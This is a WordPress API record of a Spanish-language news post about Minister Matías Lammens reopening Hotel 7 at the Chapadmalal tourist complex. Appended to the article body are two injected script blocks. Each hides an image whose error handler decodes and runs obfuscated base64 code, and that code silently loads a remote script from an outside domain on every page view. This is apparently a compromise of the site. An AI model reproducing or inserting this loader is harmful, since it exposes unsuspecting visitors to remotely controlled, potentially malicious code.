{"id":2038,"date":"2023-01-05T12:31:37","date_gmt":"2023-01-05T15:31:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2038"},"modified":"2025-08-14T00:26:18","modified_gmt":"2025-08-14T03:26:18","slug":"lammens-encabezo-la-reapertura-del-hotel-7-de-la-unidad-turistica-chapadmalal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2038","title":{"rendered":"Lammens encabez\u00f3 la reapertura del Hotel 7 de la Unidad Tur\u00edstica Chapadmalal"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>El edificio fue recuperado en diciembre de 2019 y puesto en valor con fines de turismo social.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n,\u00a0<strong>Mat\u00edas Lammens<\/strong>, encabez\u00f3 la recorrida que sign\u00f3 la reapertura del Hotel 7 de la\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/turismo-social\/ut-chapadmalal\">Unidad Tur\u00edstica Chapadmalal<\/a>, nuevamente en funcionamiento con fines de turismo social luego de 7 a\u00f1os. El espacio hab\u00eda sido cedido a Gendarmer\u00eda Nacional durante la anterior gesti\u00f3n y, en diciembre de 2019, fue recuperado y puesto en valor bajo la \u00f3rbita del Ministerio.<\/p>\n\n\n\n<p><em>\u201cPara diciembre de 2023 vamos a tener, por primera vez en 70 a\u00f1os, todos los hoteles funcionando o en obra: es una gran noticia para millones de argentinos y argentinas que los van a disfrutar, y para quienes vemos en esto la reivindicaci\u00f3n de un pa\u00eds que quiere seguir garantizando el derecho al bienestar y a las vacaciones\u201d<\/em>, expres\u00f3\u00a0<strong>Lammens<\/strong>, acompa\u00f1ado de la subsecretaria de Calidad, Accesibilidad y Sustentabilidad del Turismo Nacional,\u00a0<strong>In\u00e9s Albergucci<\/strong>. Al finalizar, el funcionario entreg\u00f3 una distinci\u00f3n a trabajadores y trabajadoras que cumplen tareas en Chapadmalal hace m\u00e1s de 30 a\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-01-04_at_21.42.58_1.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>As\u00ed, luego de la reinauguraci\u00f3n de los Hoteles 5 y 6, la reapertura del Hotel 7 es producto de una&nbsp;<strong>inversi\u00f3n de $300 millones<\/strong>, mediante la que se llevaron adelante mejoras en instalaciones sanitarias y el\u00e9ctricas, carpinter\u00eda, reparaci\u00f3n de techos, pintura y condiciones de accesibilidad, entre otras. En consecuencia,&nbsp;<strong>se agregaron 650 plazas<\/strong>&nbsp;a las ya disponibles para todo el a\u00f1o.<\/p>\n\n\n\n<p>Estos avances forman parte del hist\u00f3rico&nbsp;<strong>Plan de Obras<\/strong>&nbsp;para reconstruir las&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/social\">Unidades Tur\u00edsticas<\/a>, que consiste en la puesta en valor de los hoteles 1, 2, 3, 4, 5, 6, 7 y 8 de Chapadmalal y los hoteles 1, 2, 3, 4, 5, 6 y 7 de Embalse, junto con 36 bungal\u00f3s. Es el resultado de una&nbsp;<strong>inversi\u00f3n total de $7400 millones<\/strong>&nbsp;que signific\u00f3 adem\u00e1s la creaci\u00f3n de&nbsp;<strong>1000 puestos de trabajo directo<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El edificio fue recuperado en diciembre de 2019 y puesto en valor con fines de turismo social. El ministro de Turismo y Deportes de la Naci\u00f3n,\u00a0Mat\u00edas Lammens, encabez\u00f3 la recorrida que sign\u00f3 la reapertura del Hotel 7 de la\u00a0Unidad Tur\u00edstica Chapadmalal, nuevamente en funcionamiento con fines de turismo social luego de 7 a\u00f1os. El espacio [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2039,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18,17],"tags":[],"class_list":{"0":"post-2038","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2038"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2038"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2038\/revisions"}],"predecessor-version":[{"id":7219,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2038\/revisions\/7219"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2039"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2038"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2038"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2038"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}